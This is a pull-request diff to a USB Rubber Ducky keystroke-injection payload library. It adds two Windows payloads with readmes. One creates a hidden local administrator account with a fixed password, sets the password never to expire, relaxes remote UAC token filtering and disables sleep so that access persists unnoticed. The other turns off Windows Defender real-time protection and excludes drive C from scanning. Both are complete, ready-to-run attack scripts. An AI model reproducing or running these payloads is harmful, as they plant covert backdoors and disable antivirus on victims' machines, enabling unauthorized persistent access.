Merge pull request #39 from UberGuidoZ/master

Admin Who Never Sleeps

payloads/library/execution/Admin_Who_Never_Sleeps/ReadMe.md

@@ -0,0 +1,11 @@
+**Admin who never sleeps** (for Windows)
+
+Quick and simple script that adds a local hidden admin user then sets power settings to never sleep.
+
+**User**: WinSystem
+<br>
+**Pass**: Some-P@ssw0rd
+
+You're able to easily replace the above info, but make sure it's done everywhere! The name is used to hide it from view.
+
+_NOTE: Local admin required first!_

payloads/library/execution/Admin_Who_Never_Sleeps/payload.txt

@@ -0,0 +1,47 @@
+REM Title: Admin who never sleeps
+REM Desc: Adds a local hidden admin user and sets power settings to never sleep.
+REM Author: UberGuidoZ
+REM Target: Windows (local admin required)
+
+REM Launch admin-level CMD prompt
+DELAY 3000
+GUI r
+DELAY 1000
+STRING cmd
+DELAY 500
+CTRL-SHIFT ENTER
+DELAY 1000
+LEFTARROW
+DELAY 250
+ENTER
+DELAY 1500
+
+REM Create local admin user WinSystem with pass Some-P@ssw0rd
+STRING net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
+ENTER
+DELAY 1500
+
+REM Set WinSystem user pass to never expire, skip UAC, and hide the user
+STRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
+ENTER
+DELAY 1500
+
+REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)
+
+STRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
+ENTER
+DELAY 1000
+STRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
+ENTER
+DELAY 1000
+STRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
+ENTER
+DELAY 1000
+
+REM Set monitor timeouts to avoid noticing system is awake
+STRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
+ENTER
+DELAY 1000
+
+REM Exit and enjoy your user whenever!
+EXIT

payloads/library/general/Defeat_Defender/ReadMe.md

@@ -0,0 +1,8 @@
+Slightly modified version of the "[Disable Windows Defender](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/library/general/Disable_Windows_Defender/payload.txt)" by Zero_Sploit.
+
+Updated by B33m0 to add exception of drive C: to Defender protection, and finally updated by [UberGuidoZ](https://github.com/UberGuidoZ) to fix some UAC and newer Windows version issues.
+
+Description: Opens security settings, disables Defender, then adds an exception of drive C for persistence.<br>
+<b>NOTE: Requires local admin privledges</b>
+
+Target: Windows 10/11 (Powershell 2.0 or above)

payloads/library/general/Defeat_Defender/payload.txt

@@ -0,0 +1,60 @@
+REM Title: Disable Windows Defender
+REM Author: Zero_Sploit (v1.0)
+REM Updated: B33m0 (v1.1)
+REM Updated: UberGuidoZ (v1.2)
+REM Description: Opens security settings, disabled Defender, then adds an exception of drive C for persistence
+REM Target: Windows 10/11 (Powershell)
+REM Version: 1.2
+
+REM Pause for everything to recognize and be ready
+DELAY 2000
+
+REM Open Windows Defender Settings
+CTRL ESC
+DELAY 750
+STRING windows security
+DELAY 250
+ENTER
+DELAY 1000
+ENTER
+
+REM Navigate to Manage Settings
+DELAY 500
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 500
+
+REM Open and turn off Realtime Protection
+SPACE
+DELAY 1000
+ALT y
+DELAY 1000
+
+REM Exit security settings
+ALT F4
+DELAY 500
+
+REM Open PowerShell
+GUI r
+DELAY 500
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 1000
+ALT y
+DELAY 1000
+
+REM Exclude drive C from Defender
+STRING Add-MpPreference -ExclusionPath “C:”
+ENTER
+DELAY 2000
+
+REM Exit Powershell
+STRING EXIT
+ENTER